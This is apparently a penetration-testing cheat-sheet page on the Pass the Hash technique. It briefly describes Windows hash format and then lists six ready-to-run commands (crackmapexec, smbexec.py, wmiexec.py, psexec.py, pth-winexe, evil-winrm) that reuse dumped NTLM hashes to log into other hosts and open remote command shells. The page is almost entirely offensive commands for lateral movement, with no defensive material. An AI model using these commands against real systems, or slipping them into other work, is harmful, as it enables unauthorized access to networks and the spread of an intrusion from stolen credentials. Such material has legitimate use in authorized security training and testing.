Skip to main content

Pass the Hash

Overview

Dumped the SAM or LSA and now have hashes for domain or a local users. Use the hash and crackmapexec to pass it around the network and see if we can log into any other target(s) with that credential

Anatomy of a Windows Hash

username:SID:LM_HASH:NT_HASH::
  • The LM hash is stored for backward compatibility
  • The NT hash is used when authenticating to server by IP address or unregistered hostname
  • Otherwise, Kerberos is likely going to be used

 

Attack 1: crackmapexec --local-auth

Assumes you have the NTLM hash of a local user from SAM database

crackmapexec smb <target-or-CIDR> -u "username" -H NT_HASH --local-auth

 

Attack 2: smbexec.py

smbexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target'

 

Attack 3: wmiexec.py

wmiexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe 

 

Attack 4: psexec.py

Assumes you have the NTLM hash of a local user from SAM database Also assumes the local user has SMB write access to a share on the target

psexec.py -hashes lm-hash:nt-hash 'domain.tld/username@target' cmd.exe

 

Attack 5: pth-winexe

pth-winexe -U 'domain.tld/username%lm-hash:nt-hash' cmd.exe

 

Attack 6: WinRM

  • WinRM over HTTP – TCP/5985
  • WinRM over HTTPS – TCP/5986

Evil WinRM on Attack Box

evil-winrm -i <target_ip> -u username -H <hash>